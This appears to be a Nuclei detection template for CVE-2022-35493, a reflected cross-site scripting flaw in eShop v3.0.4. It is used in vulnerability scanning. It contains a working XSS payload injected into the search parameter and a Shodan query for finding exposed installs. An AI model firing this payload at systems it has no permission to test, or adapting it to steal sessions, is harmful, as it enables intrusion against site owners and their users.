36 lines
1.0 KiB
YAML
36 lines
1.0 KiB
YAML
id: CVE-2022-35493
|
|
|
|
info:
|
|
name: eShop - Cross-site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
|
|
reference:
|
|
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
|
|
tags: cve,cve2022,eshop,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|